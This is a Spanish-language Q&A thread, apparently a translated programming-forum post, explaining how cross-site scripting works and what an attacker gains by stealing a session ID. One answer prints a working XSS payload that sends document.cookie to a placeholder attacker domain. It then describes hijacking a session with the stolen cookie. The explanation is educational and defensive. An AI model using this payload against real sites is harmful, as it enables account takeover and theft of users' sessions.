2010-07-29 14 views
5

Por lo tanto, evitar el ataque del sitio web XSS es muy simple, solo necesita usar la función htmlspecialchars y está listo.
Pero si el desarrollador se olvidó de usarlo, ¿qué puede hacer el atacante/pirata informático? Él puede obtener su session_id, ¿verdad? Y aquí hay una pregunta. ¿Qué puede hacer con eso?
Muchas gracias.¿Cómo funciona realmente el ataque XSS?

Respuesta

9

Por lo tanto, evitar el ataque del sitio web de XSS es muy simple, solo tiene que utilizar la función htmlspecialchars y usted es bueno.

Derecha. Úselo en cualquier lugar cuando vaya a volver a mostrar entrada controlada por el usuario. Esto se refiere a todas las partes de la solicitud HTTP: encabezados, cuerpo y parámetros.

Pero si el desarrollador se olvidó de usarlo, ¿qué puede hacer el atacante/hacker?

S/he puede insertar algo de HTML/script malicioso. P.ej.lo siguiente en un cierto mensaje/comentario en una página web:

<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script> 

Lo anterior solicitar una imagen desde el dominio mailicious junto con la cookie documento como cadena de consulta.

Él puede obtener su session_id, ¿verdad? Y aquí hay una pregunta. ¿Qué puede hacer con eso?

La ID de la sesión se almacena en una cookie. Una vez que se informa al pirata informático de que se ha solicitado una imagen con la cookie en la cadena de consulta, todo lo que tiene que hacer es simplemente editar la cookie del navegador para incluir la misma ID de sesión para iniciar sesión como usuario original. Esto es obviamente muy peligroso si el usuario original es el administrador del sitio.

+0

Oye, ¿y si estoy usando 'ini_set ('session.use_only_cookies', 1);' en mi ¿guión? Aún así, 'document.cookie' va a funcionar? –

1

atacante A obtiene el miembro B para acceder al sitio C con las credenciales de B a través de un URI cuidadosamente construida.

A puede ejecutar cualquier JS que les guste en C usando las credenciales de B.

Esto les permite:

  • presentar cualquier información que les gusta a B como si viniera de C
  • Obtener el navegador de B para enviar cualquier información que desean de C a A Cuenta
    • detalles
    • información privada
  • envía ninguna instrucción al sitio C como si viniera de una
    • Publicar este tipo de spam
    • Transferir dinero a esta cuenta
    • Comprar esta muy caro libro electrónico
0

Si usted tiene una vulnerabilidad XSS en su sitio web, luego un pirata informático puede insertar cualquier código HTML en la página, incluida una etiqueta <script>. Si estoy conectado a su sitio web y visito la página atacada, mi navegador ejecutará el JavaScript insertado allí por el pirata informático y hará que mi navegador haga lo que el hacker haya intentado.

Como enviar una solicitud POST a su servidor para cambiar mi contraseña, y luego cargar una URL del servidor del hacker para notificarlo de mi número de cuenta para que pueda iniciar sesión y robar mi cuenta.

Cuestiones relacionadas